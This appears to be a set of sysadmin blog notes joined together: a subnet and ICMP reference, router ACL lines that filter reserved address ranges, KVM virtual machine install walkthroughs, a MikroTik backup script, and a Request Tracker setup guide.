255.255.255.252 11111111.11111111.11111111.11111100 /30 2 useable
255.255.255.248 11111111.11111111.11111111.11111000 /29 6 useable
255.255.255.240 11111111.11111111.11111111.11110000 /28 14 useable
255.255.255.224 11111111.11111111.11111111.11100000 /27 30 useable
255.255.255.192 11111111.11111111.11111111.11000000 /26 62 useable
255.255.255.128 11111111.11111111.11111111.10000000 /25 126 useable
255.255.255.0 11111111.11111111.11111111.00000000 /24 "Class C" 254 useable
255.255.254.0 11111111.11111111.11111110.00000000 /23 2 Class C's
255.255.252.0 11111111.11111111.11111100.00000000 /22 4 Class C's
255.255.248.0 11111111.11111111.11111000.00000000 /21 8 Class C's
255.255.240.0 11111111.11111111.11110000.00000000 /20 16 Class C's
255.255.224.0 11111111.11111111.11100000.00000000 /19 32 Class C's
255.255.192.0 11111111.11111111.11000000.00000000 /18 64 Class C's
255.255.128.0 11111111.11111111.10000000.00000000 /17 128 Class C's
255.255.0.0 11111111.11111111.00000000.00000000 /16 "Class B"
255.254.0.0 11111111.11111110.00000000.00000000 /15 2 Class B's
255.252.0.0 11111111.11111100.00000000.00000000 /14 4 Class B's
255.248.0.0 11111111.11111000.00000000.00000000 /13 8 Class B's
255.240.0.0 11111111.11110000.00000000.00000000 /12 16 Class B's
255.224.0.0 11111111.11100000.00000000.00000000 /11 32 Class B's
255.192.0.0 11111111.11000000.00000000.00000000 /10 64 Class B's
255.128.0.0 11111111.10000000.00000000.00000000 /9 128 Class B's
255.0.0.0 11111111.00000000.00000000.00000000 /8 "Class A"
254.0.0.0 11111110.00000000.00000000.00000000 /7
252.0.0.0 11111100.00000000.00000000.00000000 /6
248.0.0.0 11111000.00000000.00000000.00000000 /5
240.0.0.0 11110000.00000000.00000000.00000000 /4
224.0.0.0 11100000.00000000.00000000.00000000 /3
192.0.0.0 11000000.00000000.00000000.00000000 /2
128.0.0.0 10000000.00000000.00000000.00000000 /1
0.0.0.0 00000000.00000000.00000000.00000000 /0 IP space
Net Host Total
Net Addr Addr Addr Number
Class Range NetMask Bits Bits of hosts
----------------------------------------------------------
A 0-127 255.0.0.0 8 24 16777216 (i.e. 114.0.0.0)
B 128-191 255.255.0.0 16 16 65536 (i.e. 150.0.0.0)
C 192-254 255.255.255.0 24 8 256 (i.e. 199.0.0.0)
D 224-239 (multicast)
E 240-255 (reserved)
F 208-215 255.255.255.240 28 4 16
G 216/8 ARIN - North America
G 217/8 RIPE NCC - Europe
G 218-219/8 APNIC
H 220-221 255.255.255.248 29 3 8 (reserved)
K 222-223 255.255.255.254 31 1 2 (reserved)
(ref: RFC1375 & http://www.iana.org/assignments/ipv4-address-space )
( http://www.iana.org/numbers.htm )
----------------------------------------------------------
The current list of special use prefixes:
0.0.0.0/8
127.0.0.0/8
192.0.2.0/24
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
169.254.0.0/16
all D/E space
(ref: RFC1918 http://www.rfc-editor.org/rfc/rfc1918.txt )
( or ftp://ftp.isi.edu/in-notes/rfc1918.txt )
(rfc search: http://www.rfc-editor.org/rfcsearch.html )
( http://www.ietf.org/ietf/1id-abstracts.txt )
( http://www.ietf.org/shadow.html )
Martians: (updates at: www.iana.org/assignments/ipv4-address-space )
no ip source-route
access-list 100 deny ip host 0.0.0.0 any
deny ip 0.0.0.0 0.255.255.255 any log ! antispoof
deny ip 0.0.0.0 0.255.255.255 0.0.0.0 255.255.255.255 ! antispoof
deny ip any 255.255.255.128 0.0.0.127 ! antispoof
deny ip host 0.0.0.0 any log ! antispoof
deny ip host [router intf] [router intf] ! antispoof
deny ip xxx.xxx.xxx.0 0.0.0.255 any log ! lan area
deny ip 0/8 0.255.255.255 any log ! IANA - Reserved
deny ip 1/8 0.255.255.255 any log ! IANA - Reserved
deny ip 2/8 0.255.255.255 any log ! IANA - Reserved
deny ip 5/8 0.255.255.255 any log ! IANA - Reserved
deny ip 7/8 0.255.255.255 any log ! IANA - Reserved
deny ip 10.0.0.0 0.255.255.255 any log ! IANA - Private Use
deny ip 23/8 0.255.255.255 any log ! IANA - Reserved
deny ip 27/8 0.255.255.255 any log ! IANA - Reserved
deny ip 31/8 0.255.255.255 any log ! IANA - Reserved
deny ip 36-37/8 0.255.255.255 any log ! IANA - Reserved
deny ip 39/8 0.255.255.255 any log ! IANA - Reserved
deny ip 41-42/8 0.255.255.255 any log ! IANA - Reserved
deny ip 50/8 0.255.255.255 any log ! IANA - Reserved
deny ip 58-60/8 0.255.255.255 any log ! IANA - Reserved
deny ip 69-79/8 0.255.255.255 any log ! IANA - Reserved
deny ip 82-95/8 0.255.255.255 any log ! IANA - Reserved
deny ip 96-126/8 0.255.255.255 any log ! IANA - Reserved
deny ip 127/8 0.255.255.255 any log ! IANA - Reserved
deny ip 169.254.0.0 0.0.255.255 any log ! link-local network
deny ip 172.16.0.0 0.15.255.255 any log ! reserved
deny ip 192.168.0.0 0.0.255.255 any log ! reserved
deny ip 192.0.2.0 0.0.0.255 any log ! test network
deny ip 197/8 0.255.255.255 any log ! IANA - Reserved
deny ip 220/8 0.255.255.255 any log ! IANA - Reserved
deny ip 222-223/8 0.255.255.255 any log ! IANA - Reserved
deny ip 224.0.0.0 31.255.255.255 any log ! multicast
deny ip 224.0.0.0 15.255.255.255 any log ! unless MBGP-learned routes
deny ip 224-239/8 0.255.255.255 any log ! IANA - Multicast
deny ip 240-255/8 0.255.255.255 any log ! IANA - Reserved
filtered source addresses
0/8 ! broadcast
10/8 ! RFC 1918 private
127/8 ! loopback
169.254.0/16 ! link local
172.16.0.0/12 ! RFC 1918 private
192.0.2.0/24 ! TEST-NET
192.168.0/16 ! RFC 1918 private
224.0.0.0/4 ! class D multicast
240.0.0.0/5 ! class E reserved
248.0.0.0/5 ! reserved
255.255.255.255/32 ! broadcast
ARIN administrated blocks: (http://www.arin.net/regserv/IPStats.html)
24.0.0.0/8 (portions of)
63.0.0.0/8
64.0.0.0/8
65.0.0.0/8
66.0.0.0/8
196.0.0.0/8
198.0.0.0/8
199.0.0.0/8
200.0.0.0/8
204.0.0.0/8
205.0.0.0/8
206.0.0.0/8
207.0.0.0/8
208.0.0.0/8
209.0.0.0/8
216.0.0.0/8
----------------------------------------------------------
well known ports: (rfc1700.txt)
www.iana.org/assignments/port-numbers
protocol numbers:
www.iana.org/assignments/protocol-numbers
www.iana.org/numbers.htm
ICMP(Types/Codes)
Testing Destination Reachability & Status
(0/0) Echo-Reply
(8/0) Echo
Unreachable Destinations
(3/0) Network Unreachable
(3/1) Host Unreachable
(3/2) Protocol Unreachable
(3/3) Port Unreachable
(3/4) Fragmentaion Needed and DF set (Pkt too big)
(3/5) Source Route Failed
(3/6) Network Unknown
(3/7) Host Unknown
(3/9) DOD Net Prohibited
(3/10) DOD Host Prohibited
(3/11) Net TOS Unreachable
(3/12) Host TOS Unreachable
(3/13) Administratively Prohibited
(3/14) Host Precedence Unreachable
(3/15) Precedence Unreachable
Flow Control
(4/0) Source-Quench [RFC 1016]
Route Change Requests from Gateways
(5/0) Redirect Datagrams for the Net
(5/1) Redirect Datagrams for the Host
(5/2) Redirect Datagrams for the TOS and Net
(5/3) Redirect Datagrams for the TOS and Host
Router
(6/-) Alternate-Address
(9/0) Router-Advertisement
(10/0) Router-Solicitation
Detecting Circular or Excessively Long Routes
(11/0) Time to Live Count Exceeded
(11/1) Fragment Reassembly Time Exceeded
Reporting Incorrect Datagram Headers
(12/0) Parameter-Problem
(12/1) Option Missing
(12/2) No Room for Option
Clock Synchronization and Transit Time Estimation
(13/0) Timestamp-Request
(14/0) Timestamp-Reply
Obtaining a Network Address (RARP Alternative)
(15/0) Information-Request
(16/0) Information-Reply
Obtaining a Subnet Mask [RFC 950]
(17/0) Address Mask-Request
(18/0) Address Mask-Reply
Other
(30/0) Traceroute
(31/0) Conversion-Error
(32/0) Mobile-Redirect
root@kvm:/var/lib/libvirt/images/iso# virt-install -n Kali -r 2048 /
--disk path=/var/lib/libvirt/images/Kali.qcow2,bus=virtio,size=50,format=qcow2 /
-c /var/lib/libvirt/images/iso/kali-linux-1.0.9a-amd64.iso /
--network network=default,model=virtio --connect=qemu:///system --vnc /
--noautoconsole --hvm --video=vmvga --os-type=linux --os-variant=debianwheezy
Starting install...
Allocating 'Kali.qcow2' | 50 GB 00:00
Creating domain... | 0 B 00:00
Domain installation still in progress. You can reconnect to
the console to complete the installation process.
Now Connect with your VNC client.
I had problems with booting into graphical mode because of my old system, so I booted into single user mode. From single usermode I added the chkconfig program and disabled gdm3 from starting. I also created a sym-link from /usr/sbin/gdm3 to /usr/bin/startx, now it’s like the old backtrack where you login to the console and only start up x if you need it.
apt-get install chkconfig -y
ln -s /usr/sbin/gdm3 /usr/bin/startx
chkconfig -l
chkconfig --del gdm3
reboot
Now you can update and upgrade:
apt-get update
apt-get upgrade
Install HTOP and nethogs, HTOP shows running process and memory used including many more details. (you could use top command, but HTOP is just more useful). NetHogs shows traffic used by applications per interface. Install them using the following command:
apt-get install htop nethogs -y
You can now run then using the following commands:
htop
nethogs eth0
nethogs wlan0
Fix the graphics, if vmvga didn’t work, in my case the default cirrus needed to be changed.
virsh dumpxml Kali > /tmp/Kali.xml
vi /tmp/Kali.xml
Change cirrus to vmvga
virsh define /tmp/Kali.xml
Domain Kali defined from /tmp/Kali.xml
tom@kvm:~$ virsh start Kali
Domain Kali started
#!/bin/bash
base=/home/backups/mikrotik/hosts
hour=`date "+%H"`
dow=`date "+%w"`
dom=`date "+%d"`
if [ "$dom" = "01" ]; then
backup_file=`date "+%Y-%m-%d"`.monthly
elif [ "$dow" = "0" ]; then
backup_file=`date "+%Y-%m-%d"`.weekly
else
backup_file=`date "+%Y-%m-%d"`.daily
fi
find $base -mtime +30 -name "*weekly*" -exec rm {} \;
find $base -mtime +7 -name "*daily*" -exec rm {} \;
cd $base
ls -1 | while read host ; do
echo backing up $host
ssh -n admin-ssh@$host "/system backup save name=$backup_file" > /dev/null
ssh -n admin-ssh@$host "/export file=$backup_file" > /dev/null
scp admin-ssh@$host:$backup_file.backup $base/$host > /dev/null
scp admin-ssh@$host:$backup_file.rsc $base/$host > /dev/null
echo "rm $backup_file.backup" | sftp admin-ssh@$host &> /dev/null
echo "rm $backup_file.rsc" | sftp admin-ssh@$host &> /dev/null
done
]]>If you’re not familiar with RT, the first release in 1996 and was written by Jesse Vincent. RT is an issue ticket request tracker which began with an email interface and a tcl/tk interface. Now there is a web interface. The web interface isn’t the best, but the latest version (4.2) is much better looking than the releases of the past. I wish they would just twitter bootstrap the who thing and not bother or worry about the css.
The web interface is really for the help desk, not the ticket requestors. The ticket requests will continue to be primariy entered by sending email to the system.
I’m building this as a KVM Domain so let’s get started and clone the Ubuntu 14.04 gold master. Again, I realize I should be doing this in a devops-y way, but the install still needs to be documented before I can automate it. Also, I don’t want to use the package manager to install RT becasue I want the latest version.
virt-clone --connect=qemu:///system -o UbuntuServer1404 -n RT -f RT.qcow2
Login to the system when it comes up, become root with “sudo -i” and edit the following files to change the hostname to rt:
vi /etc/hostname
vi /etc/hosts
Now reboot, login again, become root and update the system and reboot:
sudo -i
apt-get update
apt-get upgrade
reboot
Login again, become root and cd into /usr/local/src. Download the latest version of RT from the author’s website, Best Practical. Gunzip and extract the tar file, cd into the newly created directory.
cd /usr/local/src
wget https://download.bestpractical.com/pub/rt/release/rt.tar.gz
gunzip rt.tar.gz
tar -xvf rt.tar
I’ve already gone through and figured out the package dependancies:
apt-get install build-essential mysql-server apache2 postfix mailutils openssl libyaml libyaml-appconfig-perl openssl-dev libexpat1-dev
Now let’s see what’s missing:
./configure
make testdeps
Configure CPAN
/usr/bin/perl -MCPAN -e shell
‘make fixdeps’ will install all the CPAN modules:
make fixdeps
Test again to see that all dependancies have been met:
make testdeps
Once you have met the dependancies you can install RT:
make install
Then
make initialize-database
Now comes the tricky part. First add mod_fastcgi:
apt-get install libapache2-mod-fastcgi
a2enmod fastcgi
apache2ctl graceful
Create the Request Tracker apache conf, you can compy and paste this into your terminal, hit ctrl-d to save. This is the trick, the example on the RT website is incorrect, notice I’ve commented out Order and Allow and added the Require statement.
cat > /etc/apache2/sites-available/request-tracker.conf
# Tell FastCGI to put its temporary files somewhere sane; this may
# be necessary if your distribution doesn't already set it
#FastCgiIpcDir /tmp
FastCgiServer /opt/rt4/sbin/rt-server.fcgi -processes 5 -idle-timeout 300
<VirtualHost rt.thunderhouse.com>
### Optional apache logs for RT
# Ensure that your log rotation scripts know about these files
# ErrorLog /opt/rt4/var/log/apache2.error
# TransferLog /opt/rt4/var/log/apache2.access
# LogLevel debug
AddDefaultCharset UTF-8
ScriptAlias / /opt/rt4/sbin/rt-server.fcgi/
DocumentRoot "/opt/rt4/share/html"
<Location />
#Order allow,deny
#Allow from all
Require all granted
Options +ExecCGI
AddHandler fastcgi-script fcgi
</Location>
</VirtualHost>
enable it:
a2ensite request-tracker.conf
restart apache
apachectl restart
Hit the server with a browser and you should be on your way. The default account is root/password.
]]>root@kvm:~# virt-install --os-variant list
win7 : Microsoft Windows 7
vista : Microsoft Windows Vista
winxp64 : Microsoft Windows XP (x86_64)
winxp : Microsoft Windows XP
win2k : Microsoft Windows 2000
win2k8 : Microsoft Windows Server 2008
win2k3 : Microsoft Windows Server 2003
openbsd4 : OpenBSD 4.x
freebsd8 : FreeBSD 8.x
freebsd7 : FreeBSD 7.x
freebsd6 : FreeBSD 6.x
solaris9 : Sun Solaris 9
solaris10 : Sun Solaris 10
opensolaris : Sun OpenSolaris
netware6 : Novell Netware 6
netware5 : Novell Netware 5
netware4 : Novell Netware 4
msdos : MS-DOS
generic : Generic
debianwheezy : Debian Wheezy
debiansqueeze : Debian Squeeze
debianlenny : Debian Lenny
debianetch : Debian Etch
fedora18 : Fedora 18
fedora17 : Fedora 17
fedora16 : Fedora 16
fedora15 : Fedora 15
fedora14 : Fedora 14
fedora13 : Fedora 13
fedora12 : Fedora 12
fedora11 : Fedora 11
fedora10 : Fedora 10
fedora9 : Fedora 9
fedora8 : Fedora 8
fedora7 : Fedora 7
fedora6 : Fedora Core 6
fedora5 : Fedora Core 5
mageia1 : Mageia 1 and later
mes5.1 : Mandriva Enterprise Server 5.1 and later
mes5 : Mandriva Enterprise Server 5.0
mandriva2010 : Mandriva Linux 2010 and later
mandriva2009 : Mandriva Linux 2009 and earlier
rhel7 : Red Hat Enterprise Linux 7
rhel6 : Red Hat Enterprise Linux 6
rhel5.4 : Red Hat Enterprise Linux 5.4 or later
rhel5 : Red Hat Enterprise Linux 5
rhel4 : Red Hat Enterprise Linux 4
rhel3 : Red Hat Enterprise Linux 3
rhel2.1 : Red Hat Enterprise Linux 2.1
sles11 : Suse Linux Enterprise Server 11
sles10 : Suse Linux Enterprise Server
opensuse12 : openSuse 12
opensuse11 : openSuse 11
ubuntutrusty : Ubuntu 14.04 LTS (Trusty Tahr)
ubuntusaucy : Ubuntu 13.10 (Saucy Salamander)
ubunturaring : Ubuntu 13.04 (Raring Ringtail)
ubuntuquantal : Ubuntu 12.10 (Quantal Quetzal)
ubuntuprecise : Ubuntu 12.04 LTS (Precise Pangolin)
ubuntuoneiric : Ubuntu 11.10 (Oneiric Ocelot)
ubuntunatty : Ubuntu 11.04 (Natty Narwhal)
ubuntumaverick : Ubuntu 10.10 (Maverick Meerkat)
ubuntulucid : Ubuntu 10.04 LTS (Lucid Lynx)
ubuntukarmic : Ubuntu 9.10 (Karmic Koala)
ubuntujaunty : Ubuntu 9.04 (Jaunty Jackalope)
ubuntuintrepid : Ubuntu 8.10 (Intrepid Ibex)
ubuntuhardy : Ubuntu 8.04 LTS (Hardy Heron)
virtio26 : Generic 2.6.25 or later kernel with virtio
generic26 : Generic 2.6.x kernel
generic24 : Generic 2.4.x kernel
]]>root@kvm:/var/lib/libvirt/images# virt-install -n Gold-Win7 -r 1024 /
--disk path=/var/lib/libvirt/images/Gold-Win7.qcow2,size=40,format=qcow2 /
-c /var/lib/libvirt/images/iso/7600.16385.090713-1255_x64fre_enterprise_en-us_EVAL_Eval_Enterprise-GRMCENXEVAL_EN_DVD.iso /
--accelerate --network network=default --connect=qemu:///system --vnc /
--noautoconsole -v --os-type=windows --os-variant=win7
Starting install...
Allocating 'Gold-Win7.qcow2' | 40 GB 00:00
Creating domain... | 0 B 00:01
Domain installation still in progress. Waiting for installation to complete.
]]>root@kvm:/var/lib/libvirt/images# virt-install -n Gold-WinXP -r 512 /
--disk path=/var/lib/libvirt/images/Gold-WinXP.qcow2,size=40,format=qcow2 /
-c /var/lib/libvirt/images/iso/WinXP-oem.iso --accelerate /
--network network=default /
--connect=qemu:///system --vnc --noautoconsole -v /
--os-type=windows --os-variant=winxp
Quick format
Default install
Activate it when it asks
Download SP3 to your desktop (not the vm)
Put it in the Sites folder and make sure it’s world readable
Hit it with ie in the virtual machine
Run from location
Install SP3 and reboot
Now you can go ahead and install all the updates
From here, I’m going to shutdown the vm and clone it, but I might have to reactive it. To avoid this I’m going to copy C:\WINDOWS\SYSTEM32\WPA.DBL to the desktop. If I have to reactivate then I’ll just copy this file back. Start -> Run
copy C:WINDOWS\SYSTEM32\WPA.DBL Desktop
Turn of the virtual machine
Clone the Gold Master image, it’ll look like it’s going to take an hour but it won’t:
root@kvm:/var/lib/libvirt/images# virt-clone --connect=qemu:///system -o Gold-WinXP /
-n WinXP -f WinXP.qcow2
Allocating 'WinXP.qcow2' | 40 GB 03:53
Clone 'WinXP' created successfully.
Turn it back on:
virsh # start WinXP
Domain WinXP started
Connect to it with your vnc client, I use chicken. The cloned image is usable and activated, which I didn’t think it would be. VMware usually complains if you move/clone/copy an image and then you have to sysprep and reactivate.
]]>First let’s get in virsh and shutdown the domain:
root@kvm:~# virsh
virsh # shutdown WinXP
Domain WinXP is being shutdown
Now make sure it isn’t running:
virsh # list --all
Id Name State
----------------------------------------------------
2 Ansible running
4 piaf running
14 Win81 running
15 OpenVPN running
- WinXP shut off
If the vm is still running and is stuck use “destroy” instead of shutdown in the command above and check it again with “list –all”
Two things need to happen next, the guest needs to be taken out of the kvm xml configuration and then the files need to be removed from the filesystem.
1) First let’s undefine the guest domain:
virsh # undefine WinXP
Domain WinXP has been undefined
2) Now let’s remove the disk image from the pool:
virsh # vol-delete --pool default WinXP.img
Vol WinXP.img deleted
Now download the fedora storage drivers from the kvm site
tom@kvm:~$ wget http://alt.fedoraproject.org/pub/alt/virtio-win/latest/images/virtio-win-0.1-81.iso
--2014-11-14 13:22:18-- http://alt.fedoraproject.org/pub/alt/virtio-win/latest/images/virtio-win-0.1-81.iso
Resolving alt.fedoraproject.org (alt.fedoraproject.org)... 209.132.181.24, 209.132.181.25, 209.132.181.26, ...
Connecting to alt.fedoraproject.org (alt.fedoraproject.org)|209.132.181.24|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 74143744 (71M) [application/octet-stream]
Saving to: ‘virtio-win-0.1-81.iso’
100%[==========================================================>] 74,143,744 429KB/s in 2m 49s
2014-11-14 13:25:08 (429 KB/s) - ‘virtio-win-0.1-81.iso’ saved [74143744/74143744]
Now move it into place:
tom@kvm:~$ sudo mv virtio-win-0.1-81.iso /var/lib/libvirt/images/
Transfer the iso to the kvm host and put it in /var/lib/libvirt/images
Create the virtual machine
root@kvm:/var/lib/libvirt/images# virt-install -n Win81 -r 2048 --disk path=/var/lib/libvirt/images/Win81.qcow2,bus=virtio,size=40,format=qcow2 -c /var/lib/libvirt/images/9600.17050.WINBLUE_REFRESH.140317-1640_X64FRE_ENTERPRISE_EVAL_EN-US-IR3_CENA_X64FREE_EN-US_DV9.ISO --accelerate --network network=default,model=virtio --connect=qemu:///system --vnc --noautoconsole -v --os-type=windows --os-variant=win7
Starting install...
Allocating 'Win81.qcow2' | 40 GB 00:00
Creating domain... | 0 B 00:01
Domain installation still in progress. Waiting for installation to complete.
When the install gets stuck on the storage page, eject the windows 8.1 install dvd and insert the driver iso:
virsh # domblklist Win81
Target Source
------------------------------------------------
vda /var/lib/libvirt/images/Win81.qcow2
hdc /var/lib/libvirt/images/9600.17050.WINBLUE_REFRESH.140317-1640_X64FRE_ENTERPRISE_EVAL_EN-US-IR3_CENA_X64FREE_EN-US_DV9.ISO
virsh # change-media Win81 hdc --eject
succeeded to complete action eject on media
virsh # change-media Win81 hdc /var/lib/libvirt/images/virtio-win-0.1-81.iso --insert
succeeded to complete action insert on media
You’ll see three drivers, a network driver, a scsi driver and a balloon driver, choose the scsi driver.
Now you’ll have to put the install disk back in:
virsh # change-media Win81 hdc /var/lib/libvirt/images/virtio-win-0.1-81.iso --eject
succeeded to complete action eject on media
virsh # change-media Win81 hdc /var/lib/libvirt/images/9600.17050.WINBLUE_REFRESH.140317-1640_X64FRE_ENTERPRISE_EVAL_EN-US-IR3_CENA_X64FREE_EN-US_DV9.ISO --insert
succeeded to complete action insert on media
Update the Network driver change the cdrom again:
virsh # change-media Win81 hdc --eject
succeeded to complete action eject on media
virsh # change-media Win81 hdc /var/lib/libvirt/images/virtio-win-0.1-81.iso --insert
succeeded to complete action insert on media
Choose the Red Hat Virtio Ethernet Adapter driver and PCI Adapter (Balloon Driver)
]]>root@kvm:~# virt-install -n CentOS65 -r 1024 /
--disk path=/var/lib/libvirt/images/CentOS65.qcow2,bus=virtio,size=10,format=qcow2 /
-c /var/lib/libvirt/images/CentOS-6.5-x86_64-minimal.iso /
--accelerate --network network=default,model=virtio /
--connect=qemu:///system --vnc --noautoconsole -v /
--os-type=linux --os-variant=rhel6
Starting install...
Allocating 'CentOS65.qcow2' | 10 GB 00:00
Creating domain... | 0 B 00:00
Domain installation still in progress. You can reconnect to
the console to complete the installation process.
root@kvm:/var/lib/libvirt/images# virt-clone --connect=qemu:///system -o CentOS65 -n piaf -f piaf.qcow2
Allocating 'piaf.qcow2' | 10 GB 00:02
Clone 'piaf' created successfully.
virsh # start piaf
Domain piaf started
Change into the network-scripts directory
cd /etc/sysconfig/network-scripts
Generate a new uuid for the network interface and appended it to the ifcfg-eth0 file
uuidgen >> ifcfg-eth0
Get the mac address of eth1
ifconfig -a
Edit the ifcfg-eth0 file
vi ifcfg-eth0
1. fix the uuid
2. fix the mac address
3. change ONBOOT to yes
Remove 70-persistent-net.rules, it will be regenerated automatically
rm -f /etc/udev/rules.d/70-persistent-net.rules
Change the hostname
vi /etc/network
Reboot the VM
reboot
Log back in and run a yum update
yum update
Reboot
Get the piaf3-install script and run it.
]]>